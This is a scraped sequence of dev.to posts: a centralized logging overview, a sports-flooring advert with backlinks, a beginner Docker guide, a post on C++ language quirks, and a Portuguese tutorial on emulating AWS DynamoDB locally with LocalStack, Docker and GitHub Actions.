messy room. Make sure your website’s layout is easy to navigate. ### 3. **Engage In Social Media** Promote your content on social media platforms. It not only boosts traffic but also signals Google that your content is worth looking at. ### 4. **Quality Backlinks** Focus on getting backlinks from reputable sites. A nod from an established website goes a long way. ### 5. **Consistent Updates** Update your website regularly. Stale content is a big no-no for Google. 
## Final Words Getting Google AdSense approval is no walk in the park, but with [Adsense Eligibility Checker](https://webmatrices.com/adsense-eligibility-checker), it’s certainly not Mt. Everest either. Use the tool as your personal guide to fix what needs fixing, and you’ll be raking in those ad dollars before you know it. Remember, patience and consistency are key. Now, go forth and conquer the AdSense world! --- Optimize your website with this guide, and who knows? In no time, you might just make enough from ads to finally buy that llama farm you've always wanted. 🌟
developerbishwas
1,912,164
Create diagram By Write Text
A post by friday
0
2024-07-05T03:07:20
https://dev.to/fridaymeng/create-diagram-by-write-text-35p1
<iframe width="560" height="315" src="https://www.youtube.com/embed/38zN0qMgHRw?si=wtIdPeA8Khoi3BAT" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
fridaymeng
1,912,163
Centralized Logging and Monitoring for Spring Boot and React Applications
Centralized Logging and Monitoring for Spring Boot and React Applications Modern web...
0
2024-07-05T03:04:23
https://dev.to/virajlakshitha/centralized-logging-and-monitoring-for-spring-boot-and-react-applications-1loa
![usecase_content](https://cdn-images-1.medium.com/proxy/1*zqfBK-ivKOyE5TLv4mHkkA.png) # Centralized Logging and Monitoring for Spring Boot and React Applications Modern web applications, often built on microservice architectures with components like Spring Boot for the backend and React for the frontend, require robust logging and monitoring solutions. Centralized logging and monitoring are essential for maintaining application health, troubleshooting issues, and gaining insights into performance bottlenecks. This blog post will discuss the importance and challenges of centralized logging and monitoring, delve into various use cases, explore different implementation approaches, and compare available tools and services. ### Understanding Centralized Logging and Monitoring Centralized logging and monitoring involve collecting, aggregating, and analyzing log data and performance metrics from various parts of your application, including: * **Application Logs:** Detailed messages generated by the Spring Boot backend, encompassing information about API requests, database interactions, exceptions, and custom debug messages. * **Web Server Logs:** Access logs from your web server (e.g., Nginx, Apache) capturing details about each HTTP request handled. * **Frontend Logs:** Events and error messages from your React frontend, providing insights into user interactions, JavaScript errors, and network requests. * **Infrastructure Metrics:** System-level metrics like CPU usage, memory consumption, disk I/O, and network traffic from the underlying infrastructure hosting your application. ### The Why: Use Cases for Centralized Logging and Monitoring Let's explore specific scenarios where centralized logging and monitoring are invaluable: **1. Rapid Incident Response and Root Cause Analysis:** Imagine a critical API endpoint experiencing a sudden surge in errors. Centralized logging allows you to quickly correlate error logs from your Spring Boot backend with corresponding web server access logs. This correlation can pinpoint the source of the issue – whether it's due to a code bug, a spike in traffic, or an external dependency failure. **2. Performance Optimization and Bottleneck Identification:** By monitoring key performance indicators (KPIs) such as API response times, database query durations, and frontend rendering times, you can identify bottlenecks in your application. For example, slow database queries revealed through centralized monitoring might lead you to optimize a database index or refactor a query for better performance. **3. Security Auditing and Threat Detection:** Centralized logs serve as an audit trail for security-related events. By analyzing access logs and application logs, you can detect suspicious activity like unauthorized login attempts, data breaches, or injection attacks. Real-time monitoring of these logs allows for immediate alerts and quicker responses to potential security threats. **4. Capacity Planning and Resource Optimization:** Historical data on resource utilization – CPU, memory, network – are crucial for capacity planning. By analyzing trends in log data and metrics, you can predict future resource needs, optimize resource allocation, and prevent performance degradation due to insufficient resources. **5. User Behavior Analysis and Application Improvement:** Frontend logs capturing user interactions can be analyzed to understand user behavior patterns, identify popular features, and uncover usability issues. 
These insights are essential for making data-driven decisions regarding feature prioritization and UX/UI improvements in your React application. ### Implementation Approaches **1. ELK Stack (Elasticsearch, Logstash, Kibana):** A popular open-source stack. Logstash collects and processes logs from various sources, Elasticsearch provides fast and scalable log storage and indexing, and Kibana offers a powerful interface for data visualization and analysis. **2. Splunk:** A commercial log management and analysis platform known for its real-time data ingestion, robust search capabilities, and comprehensive dashboards for monitoring. **3. AWS CloudWatch:** Amazon's managed service for log collection, storage, analysis, and monitoring. Seamless integration with other AWS services makes it a suitable choice for applications hosted on AWS. **4. Azure Monitor:** Microsoft's cloud monitoring service providing a centralized platform to collect, analyze, and act on telemetry from your applications and Azure resources. **5. Datadog:** A cloud-based monitoring platform offering real-time insights into your applications, infrastructure, and network. It's known for its extensive integrations and customizable dashboards. ### Comparing Options | Feature | ELK Stack | Splunk | AWS CloudWatch | Azure Monitor | Datadog | |----------------|-----------|---------|---------------|---------------|---------| | Type | Open-source | Commercial | Managed Service | Managed Service | Commercial | | Scalability | High | High | High | High | High | | Cost | Variable (infrastructure) | Subscription-based | Pay-as-you-go | Pay-as-you-go | Subscription-based | | Learning Curve| Steep | Moderate | Moderate | Moderate | Moderate | ### Conclusion Centralized logging and monitoring are no longer optional for modern applications. They are essential for ensuring application health, troubleshooting issues proactively, and making data-driven decisions. Carefully evaluate the different approaches and tools discussed to select the best fit for your application's specific needs and your organization's technical expertise and budget. ### Advanced Use Case: Real-time Anomaly Detection and Automated Remediation (Software Architect/AWS Solution Architect Perspective) Let's consider a more advanced use case where we combine the power of centralized logging and monitoring with machine learning for proactive anomaly detection and automated remediation. **Scenario:** We have a Spring Boot microservice handling financial transactions. Maintaining the integrity and availability of this service is paramount. **Architecture:** * **Spring Boot Application:** Instrumented to emit detailed metrics and logs to Amazon CloudWatch Logs. * **AWS CloudWatch Logs:** Collects and aggregates logs from the application. * **AWS Kinesis Data Firehose:** Streams real-time log data from CloudWatch Logs. * **AWS Lambda:** Processes the log stream, performing real-time anomaly detection using a pre-trained machine learning model (e.g., an anomaly detection algorithm in Amazon SageMaker). * **AWS SNS (Simple Notification Service):** Sends alerts to operations teams upon detection of anomalies. * **AWS Lambda (Remediation):** Triggered by SNS alerts, executes automated remediation actions – for instance, scaling up the application or isolating a faulty instance. **Benefits:** * **Proactive Issue Mitigation:** By identifying anomalies in real time, we can proactively address potential problems before they impact end-users. 
* **Reduced Mean Time to Resolution (MTTR):** Automated remediation significantly reduces the time it takes to recover from failures, enhancing application availability. * **Data-Driven Insights:** The machine learning model continuously learns from historical data, improving anomaly detection accuracy over time. This advanced use case demonstrates how centralized logging and monitoring, when combined with other powerful cloud services and machine learning, can enable organizations to build highly resilient and self-healing applications.
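To make the detection step more concrete, here is a minimal Python sketch of the anomaly-detection Lambda described in the architecture above. It is an illustration only: the Kinesis event wiring, the SNS topic ARN, the `response_time_ms` log field, and the fixed latency threshold (standing in for a real SageMaker model call) are assumptions, not part of the original design.

```python
import base64
import json

import boto3

sns = boto3.client("sns")

# Placeholder values for illustration only.
ALERT_TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:transaction-alerts"
LATENCY_THRESHOLD_MS = 500


def handler(event, context):
    """Scan a batch of Kinesis records for anomalous transaction log events."""
    anomalies = []
    for record in event.get("Records", []):
        # Kinesis delivers each log event base64-encoded in the record payload.
        payload = base64.b64decode(record["kinesis"]["data"])
        log_event = json.loads(payload)
        # Stand-in for a real model call (e.g. invoking a SageMaker endpoint).
        if log_event.get("response_time_ms", 0) > LATENCY_THRESHOLD_MS:
            anomalies.append(log_event)

    if anomalies:
        # Notify the operations team; a second Lambda subscribed to this topic
        # could then run the automated remediation step.
        sns.publish(
            TopicArn=ALERT_TOPIC_ARN,
            Subject="Transaction service anomaly detected",
            Message=json.dumps(anomalies[:10]),
        )
    return {"anomalies_found": len(anomalies)}
```

In a production setup, the threshold check would typically be replaced by a call to the trained anomaly-detection model, and the alert payload trimmed to whatever the on-call tooling expects.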
virajlakshitha
1,912,162
Hãng thảm sàn thể thao Enlio
Enlio là thương hiệu hàng đầu thế giới về sản xuất thảm sàn thể thao, đặc biệt là thảm cầu lông. Với...
0
2024-07-05T03:02:57
https://dev.to/enliovietnamox/hang-tham-san-the-thao-enlio-o8c
Enlio is a world-leading brand in the manufacture of sports flooring, especially badminton court mats. With a reputation and quality proven by sponsoring and supplying flooring for many major international badminton tournaments, Enlio has established itself as a trusted partner of professional athletes and sports organizations. The Y-65170X basketball mat is specially designed to meet strict standards for bounce, friction, and durability, ensuring the best competition experience for players. It comes in a wood-grain finish and is designed for indoor installation. It is made in China, with the following specifications: Format: 1.8 x 15 m roll; Warranty: 5 years; Thickness: 7.0 mm.

In addition, Enlio offers a wide range of other sports flooring, such as basketball, volleyball, and tennis flooring, to meet the market's diverse needs. With advanced production technology and high-quality materials, Enlio is committed to delivering sports flooring that is safe, environmentally friendly, and long-lasting. The brand continuously improves and develops to meet growing customer expectations while contributing to the development of sports worldwide.

Website: https://enlio.vn/tham-bong-chuyen-enlio-y-46170
Phone: 0983269911
Address: 127 Hoàng Văn Thái, Hải Dương City, Hải Dương Province
https://manylink.co/@enliovietnamyl
https://willysforsale.com/profile/enliovietnamib
https://jsfiddle.net/user/enliovietnamjp
https://www.shippingexplorer.net/en/user/enliovietnamjx/108252
https://lab.quickbox.io/enliovietnamvl
https://telegra.ph/enliovietnam-07-05
https://www.slideserve.com/enliovietnamhx
https://dutrai.com/members/enliovietnamee.27708/#about
https://www.credly.com/users/hang-th-m-san-th-thao-enlio.42d48b59/badges
https://www.ameba.jp/profile/general/enliovietnamfb/?account_block_token=3FFRKovBIq16UGmprcrbjaba1Tk6IuNK
https://tvchrist.ning.com/profile/HangthamsanthethaoEnlio662
https://hub.docker.com/u/enliovietnammp
https://boersen.oeh-salzburg.at/author/enliovietnamon/
http://buildolution.com/UserProfile/tabid/131/userId/410317/Default.aspx
https://turkish.ava360.com/user/enliovietnamzd/#
https://dlive.tv/enliovietnamcj
https://dev.to/enliovietnamox
https://club.doctissimo.fr/enliovietnamsq/
https://www.silverstripe.org/ForumMemberProfile/show/159409
https://expathealthseoul.com/profile/hang-thảm-san-thể-thao-enlio-668761656e935/
https://www.giveawayoftheday.com/forums/profile/199512
https://wirtube.de/a/enliovietnambp/video-channels
https://participez.nouvelle-aquitaine.fr/profiles/enliovietnam_15/activity?locale=en
https://www.naucmese.cz/hang-tham-san-the-thao-enlio-6?_fid=bjfn
enliovietnamox
1,912,161
Team Building 101: Communication & Innovation | Paul Lewis from Pythian 🎙️
In this episode, host Kovid Batra is joined by Paul Lewis, a seasoned technology leader with over 30...
0
2024-07-05T03:01:26
https://dev.to/grocto/team-building-101-communication-innovation-paul-lewis-from-pythian-4bem
webdev, forem, podcast, career
In this episode, host Kovid Batra is joined by Paul Lewis, a seasoned technology leader with over 30 years of experience. Paul has held prominent roles, including CTO at Hitachi Vantara, and currently serves as CTO at Pythian. In addition to his professional roles, Paul actively contributes to academia as a board member of the Schulich School of Business. In today’s episode, Paul shares his insights on building tech teams from scratch, offering valuable perspectives from his vast experience in the technology sector. 💡 Highlights a) Getting Candid 👨🏻‍💻 Paul’s introduction 🌈 Witnessing a spectrum of technology b) Professional Journey 💼 Switching from IT to OT at Hitachi Vantara 🚀 Innovation & future tech at Pythian c) Key Takeaways 💟 Establishing a collaborative team culture ✅ Hiring & talent acquisition strategy 💬 Processes & communication in growing teams 🤖 Aligning tech innovation with business requirements Full Podcast - [https://grocto.substack.com/p/ep-44-team-building-101-communication]
grocto
1,912,159
Introduction to Docker: A Beginner's Guide
In today's fast-paced software development world, deploying applications quickly and reliably is...
0
2024-07-05T02:58:01
https://dev.to/mahendraputra21/introduction-to-docker-a-beginners-guide-1d9i
docker, container, devops, dockerfile
In today's fast-paced software development world, deploying applications quickly and reliably is crucial. Docker, a powerful tool, helps developers achieve this by enabling the creation, deployment, and running of applications in containers. This guide will introduce you to Docker, explaining its core concepts and how it can benefit your development process. --- ![docker images](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2uuhdy7h7p3st4vjo7xf.png) ## What is Docker? Docker is a platform designed to simplify the process of developing, shipping, and running applications. It uses containerization technology, which allows you to package an application and its dependencies into a standardized unit called a container. Containers are lightweight, portable, and can run consistently across different environments, from development to production. ## Why Use Docker? Docker offers several advantages for developers and organizations: 1. **Consistency:** Containers ensure that an application runs the same way, regardless of where it is deployed. This consistency eliminates the "it works on my machine" problem. 2. **Isolation:** Each container runs in its own isolated environment, which means that dependencies and configurations do not interfere with one another. 3. **Scalability:** Docker makes it easy to scale applications by adding or removing containers as needed. 4. **Portability:** Containers can run on any system that supports Docker, making it easy to move applications between different environments. ## Core Concepts of Docker To get started with Docker, it's essential to understand its core concepts: **1. Images** A Docker image is a lightweight, standalone, and executable software package that includes everything needed to run a piece of software, including the code, runtime, libraries, and dependencies. Images are created from a set of instructions written in a `Dockerfile`. Example of a simple Dockerfile: ``` # Use an official Python runtime as a parent image FROM python:3.8-slim # Set the working directory in the container WORKDIR /app # Copy the current directory contents into the container at /app COPY . /app # Install any needed packages specified in requirements.txt RUN pip install --no-cache-dir -r requirements.txt # Make port 80 available to the world outside this container EXPOSE 80 # Run app.py when the container launches CMD ["python", "app.py"] ``` **2. Containers** A container is a runtime instance of a Docker image. When you run a Docker image, it becomes a container. Containers can be started, stopped, moved, and deleted. Each container is an isolated environment, which makes it ideal for running applications without affecting the host system. **3. Docker Hub** Docker Hub is a cloud-based repository where Docker users can find and share container images. It hosts official images for popular software and user-contributed images. You can pull images from Docker Hub and use them in your projects. Example of pulling an image from Docker Hub: `docker pull nginx` ## Getting Started with Docker To start using Docker, follow these simple steps: 1. **Install Docker:** Download and install Docker Desktop from the [official Docker website](https://www.docker.com/). 2. **Run a Container:** Open a terminal and run your first container using a simple command: ``` docker run hello-world ``` This command pulls the `hello-world` image from Docker Hub, creates a container, and runs it. 3. 
**Create a Dockerfile:** Write a `Dockerfile `for your application to define how the image should be built. 4. **Build an Image:** Use the `docker build` command to create an image from your `Dockerfile`: ``` docker build -t my-app . ``` 5. **Run Your Container:** Use the `docker run` command to start a container from your image: ``` docker run -p 4000:80 my-app ``` This command maps port 4000 on your host to port 80 in the container, making your application accessible at `http://localhost:4000`. --- ## Conclusion Docker is a powerful tool that can streamline your development and deployment process by providing a consistent, isolated, and portable environment for your applications. By understanding its core concepts and following the basic steps to get started, you can leverage Docker to improve your workflow and deliver software more efficiently.
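As a quick footnote to the sample Dockerfile above: it expects an `app.py` (and a `requirements.txt`, which can be empty) to exist in the build context. Below is a minimal, hypothetical `app.py` using only the Python standard library so the example builds and runs end to end; the handler and message are placeholders of my own, not part of any official Docker material.

```python
# app.py - a tiny web server for the sample Dockerfile to run
from http.server import BaseHTTPRequestHandler, HTTPServer


class HelloHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET request with a short plain-text message
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Hello from inside a Docker container!\n")


if __name__ == "__main__":
    # The Dockerfile EXPOSEs port 80, and `docker run -p 4000:80 my-app`
    # maps it to port 4000 on the host.
    HTTPServer(("0.0.0.0", 80), HelloHandler).serve_forever()
```

With this file in place, `docker build -t my-app .` followed by `docker run -p 4000:80 my-app` should serve the message at `http://localhost:4000`.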
mahendraputra21
1,912,158
The Quirky Side of C++: Weird Stuff That Makes Us Love (and Hate) It
Welcome, fellow coders, to a whimsical journey through the quirks and oddities of C++. While C++ is...
0
2024-07-05T02:51:43
https://dev.to/subham_behera/the-quirky-side-of-c-weird-stuff-that-makes-us-love-and-hate-it-4k31
cpp, programming, learning, coding
Welcome, fellow coders, to a whimsical journey through the quirks and oddities of C++. While C++ is celebrated for its power and flexibility, it also comes with a host of peculiarities that can surprise even seasoned developers. Let's dive into some of the weird and wonderful aspects of C++ that make it the charming (and sometimes infuriating) language it is.

---

#### 1. The Infamous "Most Vexing Parse"

One of the most notorious oddities in C++ is the "most vexing parse," a term coined by Scott Meyers. This quirk can turn what looks like an innocuous declaration into something entirely unexpected.

```cpp
std::vector<int> v(std::istream_iterator<int>(std::cin), std::istream_iterator<int>());
```

You might think this creates a vector filled with the integers read from standard input. But no, it actually declares a function named `v` that returns a `std::vector<int>`, taking one parameter of type `std::istream_iterator<int>` (named `cin`, with redundant parentheses) and a second unnamed parameter whose type is a pointer to a function returning `std::istream_iterator<int>`. To avoid this, use uniform initialization (a.k.a. brace initialization):

```cpp
std::vector<int> v{std::istream_iterator<int>(std::cin), std::istream_iterator<int>()};
```

(One caveat: braces have their own quirk with plain integers. `std::vector<int> v{10, 20};` picks the `initializer_list` constructor and gives you the two elements 10 and 20, not ten elements with the value 20.)

---

#### 2. Default Arguments in Function Templates

Default arguments in function templates can lead to some baffling behaviour. Consider this example:

```cpp
template<typename T>
void foo(T t = 10) {
    std::cout << t << std::endl;
}

int main() {
    foo(); // Error: no matching function for call to 'foo()'
}
```

Even though `10` is a valid default argument for an `int`, the compiler doesn't know `T` is `int` until it's explicitly told. A workaround is to use an overloaded function:

```cpp
void foo(int t = 10) {
    std::cout << t << std::endl;
}

template<typename T>
void foo(T t) {
    std::cout << t << std::endl;
}

int main() {
    foo(); // Works!
}
```

---

#### 3. The Magic of SFINAE

SFINAE (Substitution Failure Is Not An Error) is a cornerstone of C++ template metaprogramming, allowing for complex template logic. However, it can be quite perplexing at first glance.

```cpp
template<typename T>
auto test(int) -> decltype(std::declval<T>().foo(), std::true_type{});

template<typename T>
std::false_type test(...);

struct HasFoo {
    void foo() {}
};

int main() {
    std::cout << decltype(test<HasFoo>(0))::value << std::endl; // Prints 1 (true)
    std::cout << decltype(test<int>(0))::value << std::endl;    // Prints 0 (false)
}
```

The SFINAE magic here checks if a type `T` has a member function `foo` and sets the return type accordingly. It's a powerful feature, but can lead to head-scratching moments.

---

#### 4. The Curious Case of `std::vector<bool>`

`std::vector<bool>` is a special case in the C++ Standard Library. Unlike other `std::vector` specializations, it doesn't store `bool` values directly. Instead, it uses a bit-field-like structure to save space, leading to unexpected behaviour.

```cpp
std::vector<bool> vb = {true, false, true};
vb[0] = false;
std::cout << std::boolalpha << vb[0] << std::endl; // Prints false
```

The non-standard representation can cause performance issues and surprising side effects. If you need a true `std::vector` of boolean-like values, consider using `std::vector<char>` or `std::vector<int>` instead.

---

#### 5. The Hidden Cost of Copy Elision

Copy elision is an optimization technique where the compiler omits unnecessary copy and move operations. However, this can lead to some unexpected scenarios.
```cpp
struct Widget {
    Widget() { std::cout << "Widget()" << std::endl; }
    Widget(const Widget&) { std::cout << "Widget(const Widget&)" << std::endl; }
    Widget(Widget&&) { std::cout << "Widget(Widget&&)" << std::endl; }
};

Widget createWidget() {
    return Widget();
}

int main() {
    Widget w = createWidget();
}
```

With copy elision, the compiler might optimize away the copy and move constructors, making it seem like they are never called, even though they exist.

---

#### 6. The Enigma of Name Hiding

Name hiding can cause some truly baffling behaviour. If a derived class declares a member with the same name as one in the base class, it hides all base class members with that name, even if the signatures are different.

```cpp
struct Base {
    void f(int) { std::cout << "Base::f(int)" << std::endl; }
};

struct Derived : Base {
    void f(double) { std::cout << "Derived::f(double)" << std::endl; }
};

int main() {
    Derived d;
    d.f(10); // Prints "Derived::f(double)": Base::f(int) is hidden, so 10 is silently converted to double
}
```

To avoid this surprise, bring the base class function into scope using `using`:

```cpp
struct Derived : Base {
    using Base::f;
    void f(double) { std::cout << "Derived::f(double)" << std::endl; }
};

int main() {
    Derived d;
    d.f(10);   // Prints "Base::f(int)"
    d.f(10.0); // Prints "Derived::f(double)"
}
```

---

#### Conclusion

C++ is a language full of quirks and intricacies that can be both fascinating and frustrating. These weird aspects are part of what makes C++ so powerful and versatile, yet they also highlight the importance of understanding the language deeply. Embrace the quirks, and you'll find C++ to be an endlessly rewarding language.

---

Feel free to share your own C++ oddities and experiences in the comments below. Happy coding!

---
subham_behera
1,912,156
Caso de uso: LocalStack
Um pouco sobre o LocalStack O LocalStack é um emulador de serviços AWS que abrange seus...
0
2024-07-05T02:46:39
https://dev.to/joserafaelsh/caso-de-uso-localstack-3gc5
aws, docker, githubactions, node
## A bit about LocalStack

**LocalStack** is an **AWS** service emulator that covers the main AWS services, some free of charge and some not. The goal of the tool is to make it easier to develop applications that use **AWS** services: it reduces the risk of development costs, improves the developer experience around permission configuration problems with **IAM**, and provides a test environment, both for learning and experimenting with **AWS** services and for processes such as **CI** with GitHub Actions integrations. **LocalStack** also integrates with other great tools such as **Pulumi**, **Serverless**, **Terraform**, and **Testcontainers**.

Read more: [https://docs.localstack.cloud/getting-started/](https://docs.localstack.cloud/getting-started/)

## The scenario

Suppose a simple application that performs all the operations of a **CRUD** against a **DynamoDB** table. Regardless of how the developer builds this application, sooner or later they will have to hit the production table to validate what was done, whether with the manual tests we all do or with **integration** and **e2e tests**, and that is where the problem starts to appear.

## The problem

**DynamoDB** charges per table operation, which means that before the application is actually finished and made available, costs have already been incurred. Add a bit more complexity to the system, integrating asynchronous processing with **SQS**, events with **EventBridge**, and notifications with **SNS** and **SES**, and there you go: your AWS bill is already running before day 0 of your application.

## The solution

In this scenario, we can use **LocalStack** in our development environment, an **AWS** cloud service emulator whose goal is to speed up and simplify the development and testing of applications that use **AWS** cloud services. Using **Docker**, **docker-compose**, and the **AWS SDK** for the programming language in use, we can spin up a **LocalStack** container and, through the **SDK**'s **URL** configuration and **environment variables**, point the calls to **LocalStack** in development and testing, minimizing costs during development. In the case presented above, we could run it entirely inside **LocalStack** using the **DynamoDB** service and the extra services such as **SQS**, **EventBridge**, **SNS**, and **SES** (in simulated form). This would guarantee **zero cost** for cloud services during development and in **CI/CD pipelines**, since **LocalStack** also integrates with **GitHub Actions**.

## Implementation

To illustrate its use, and based on the application presented above, I partially implemented a simple product **CRUD** with only two operations: creating an item and reading all the items in the table. The implementation uses only Node 22 features, including its built-in test runner. The application is a regular API with two routes: one to create an item and another to read all the items from a **DynamoDB** table. To configure my development environment, I used a **.env** file to store my access variables and the **AWS endpoint**. This file lets us quickly switch the environment the application runs in without actually touching the code.
```bash
NODE_ENV="dev"
PORT=3000
AWS_ENDPOINT=http://localhost:4566
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=fake_id
AWS_SECRET_ACCESS_KEY=fake_secret
ITEMS_TABLE_NAME="items_table"
```

**LocalStack was also used with Docker and docker-compose.**

```yaml
services:
  localstack:
    container_name: "localstack"
    image: localstack/localstack
    ports:
      - "127.0.0.1:4566:4566"            # LocalStack Gateway
      - "127.0.0.1:4510-4559:4510-4559"  # external services port range
    volumes:
      - "/var/run/docker.sock:/var/run/docker.sock" # required for some services
      - ./setup.sh:/etc/localstack/init/ready.d/start-localstack.sh
```

**In the docker-compose file, it is worth highlighting the last volume. It is a .sh script that is copied into the LocalStack container and executed as part of the container's startup. This file contains the command to create a DynamoDB table.**

```bash
#!/bin/bash
awslocal dynamodb create-table --table-name items_table --key-schema AttributeName=id,KeyType=HASH --attribute-definitions AttributeName=id,AttributeType=S --billing-mode PAY_PER_REQUEST --region us-east-1
```

All the commands for working with **AWS** services in **LocalStack** can be found in the tool's documentation. With the container running and the **.env** file configured, the next step is to configure, in code, the client for the service that will be used. In this case, that service is the **DynamoDBClient**. **Note that the AWS SDK v3 for Node.js was used.** The **DynamoDBClient** takes the following configuration as a parameter:

```jsx
const awsConfig = {
  endpoint: process.env.AWS_ENDPOINT,
  region: process.env.AWS_REGION,
  credentials: {
    accessKeyId: process.env.AWS_ACCESS_KEY_ID,
    secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  },
};
```

Since we pass all of our configuration through environment variables, we do not need to change any part of the code to switch between our development environment and production. Our application's **DynamoDB** client configuration ended up like this:

```jsx
import {
  CreateTableCommand,
  DeleteTableCommand,
  DynamoDBClient,
  PutItemCommand,
  ScanCommand,
} from "@aws-sdk/client-dynamodb";
import { PutCommand } from "@aws-sdk/lib-dynamodb";

const awsConfig = {
  endpoint: process.env.AWS_ENDPOINT,
  region: process.env.AWS_REGION,
  credentials: {
    accessKeyId: process.env.AWS_ACCESS_KEY_ID,
    secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  },
};

const dynamoClient = new DynamoDBClient(awsConfig);

export const Dynamo = {
  getAllItems: (tableName) => {
    return dynamoClient.send(
      new ScanCommand({
        TableName: tableName,
      })
    );
  },
  createItem: (item, tableName) => {
    return dynamoClient.send(
      new PutCommand({
        TableName: tableName,
        Item: {
          ...item,
        },
      })
    );
  },
  createTable: (tableName) => {
    return dynamoClient.send(
      new CreateTableCommand({
        TableName: tableName,
        KeySchema: [
          {
            AttributeName: "id",
            KeyType: "HASH",
          },
        ],
        AttributeDefinitions: [
          {
            AttributeName: "id",
            AttributeType: "S",
          },
        ],
        ProvisionedThroughput: {
          ReadCapacityUnits: 1,
          WriteCapacityUnits: 1,
        },
      })
    );
  },
  deleteTable: (tableName) => {
    return dynamoClient.send(
      new DeleteTableCommand({
        TableName: tableName,
      })
    );
  },
};
```

Since one of the goals of **LocalStack** is to enable local testing of **AWS** services, I created a simple test routine, just to make sure we can run the two operations our application is meant to perform.
```jsx
import { describe, it } from "node:test";
import { Dynamo } from "../dynamo-db.js";
import assert from "node:assert/strict";

describe("Integrations tests with DynamoDB and LocalStack", () => {
  const database = Dynamo;
  const testTableName = "items_table_test";

  it("it should create the items table", async () => {
    const response = await database.createTable(testTableName);
    const status = response["$metadata"].httpStatusCode;
    assert.equal(response != undefined, true);
    assert.equal(status, 200);
  });

  it("it should create a item", async () => {
    const response = await database.createItem(
      {
        id: "123",
        name: "teste",
        price: 100,
      },
      testTableName
    );
    const status = response["$metadata"].httpStatusCode;
    assert.equal(response != undefined, true);
    assert.equal(status, 200);
  });

  it("it should get all items", async () => {
    const response = await database.getAllItems(testTableName);
    const status = response["$metadata"].httpStatusCode;
    assert.equal(response != undefined, true);
    assert.equal(status, 200);
    assert.equal(response.Count > 0, true);
    assert.equal(response.ScannedCount > 0, true);
    assert.equal(response.Items.length > 0, true);
  });

  it("it should delete the items table", async () => {
    const response = await database.deleteTable(testTableName);
    assert.equal(response != undefined, true);
  });
});
```

**At the end of development, I created a GitHub action so we can run our tests in a CI/CD pipeline.**

```yaml
name: CI using localstack
on: push
jobs:
  continuos-integration:
    runs-on: ubuntu-latest
    environment: poc-node-js-localstack-env
    steps:
      - uses: actions/checkout@v3
      - name: Using Node.js
        uses: actions/setup-node@v2
        with:
          node-version: 22.
      - name: Start LocalStack
        uses: LocalStack/[email protected]
        with:
          image-tag: 'latest'
          install-awslocal: 'true'
      - name: Create .env file
        run: |
          touch .env
          echo "AWS_ACCESS_KEY_ID=${{vars.AWS_ACCESS_KEY_ID}}" >> .env
          echo "AWS_ENDPOINT=${{vars.AWS_ENDPOINT}}" >> .env
          echo "AWS_REGION=${{vars.AWS_REGION}}" >> .env
          echo "AWS_SECRET_ACCESS_KEY=${{vars.AWS_SECRET_ACCESS_KEY}}" >> .env
          echo "ITEMS_TABLE_NAME=${{vars.ITEMS_TABLE_NAME}}" >> .env
          cat .env
      - name: run install, build and test
        run: |
          npm install
          npm run test
```

Here is the link with more information about the **LocalStack** integration with **GitHub Actions**: [https://docs.localstack.cloud/user-guide/ci/github-actions/](https://docs.localstack.cloud/user-guide/ci/github-actions/). This resource can help you set up **CI/CD pipelines** that use **LocalStack** for local testing of **AWS** services.

## Limitations

Not every service that can be emulated with **LocalStack** is fully implemented and stable. Taking **DynamoDB** and **SES** as examples, most **DynamoDB** features are only partially implemented and, for SES, most of its operations are unstable. From this we can conclude that we need to pay attention to the services and their features so that there are no sharp divergences between our development and test environments and production. In **LocalStack**'s documentation we can find all the services and their respective coverage levels.
## A few examples

- docker-compose

```docker
services:
  localstack:
    container_name: "localstack"
    image: localstack/localstack
    ports:
      - "127.0.0.1:4566:4566"            # LocalStack Gateway
      - "127.0.0.1:4510-4559:4510-4559"  # external services port range
    volumes:
      - "/var/run/docker.sock:/var/run/docker.sock" # required for some services
```

- NodeJS DynamoDB example

```jsx
import { DynamoDBClient } from "@aws-sdk/client-dynamodb";

const dynamodbConfig = {
  region: "us-east-1",
};

const isLocal = IS_OFFLINE === "true";

if (isLocal) {
  const host = LOCALSTACK_HOST || "localhost";
  dynamodbConfig["endpoint"] = `http://${host}:4566`;
}

const client = new DynamoDBClient(dynamodbConfig);
```

- NodeJS SQS NestJS example

```tsx
@Injectable()
export class SqsService {
  private readonly client: SQSClient = new SQSClient({
    endpoint: this.envConfigService.getAwsEndpoint() || process.env.AWS_ENDPOINT,
    region: this.envConfigService.getAwsRegion(),
    credentials: {
      accessKeyId: this.envConfigService.getAwsAccessKeyId(),
      secretAccessKey: this.envConfigService.getAwsSecretAccessKey(),
    },
  });

  constructor() {}
}
```

```bash
NODE_ENV=prod
AWS_ENDPOINT=protocol://service-code.region-code.amazonaws.com
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=real_id
AWS_SECRET_ACCESS_KEY=real_secret
```

```bash
NODE_ENV=dev
AWS_ENDPOINT=http://localhost:4566
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=fake_id
AWS_SECRET_ACCESS_KEY=fake_secret
```

The **endpoint** follows this pattern: “protocol://service-code.region-code.amazonaws.com”. An example **endpoint** is “https://dynamodb.us-west-2.amazonaws.com”. For the development environment, the endpoint points to the port where the LocalStack container is running. Note that the access keys and IDs can simply be a dummy value such as “teste” when running locally.

## Extra resources

- Available services: [localstack-services](https://docs.localstack.cloud/user-guide/aws/feature-coverage/)
- List of AWS SDKs: [AWS-SDKs](https://aws.amazon.com/developer/tools/)
- Docker: [Docker](https://docs.docker.com/engine/install/ubuntu/)
- LocalStack GitHub: [localstack-github](https://github.com/localstack/localstack)
- AWS endpoints: [aws-endpoint-config](https://docs.aws.amazon.com/general/latest/gr/rande.html)
- Usage example: [localstack-test-erick-wendel](https://www.youtube.com/watch?v=rwyhw9UYHkA)
- Repo with the code developed: [joserafaelSH/poc-node-js-localstack](https://github.com/joserafaelSH/poc-node-js-localstack)
joserafaelsh
1,912,155
How to use IP2Location.io and IP2WHOIS in Flask?
Introduction Flask is a Python micro web framework that does not rely on any particular...
0
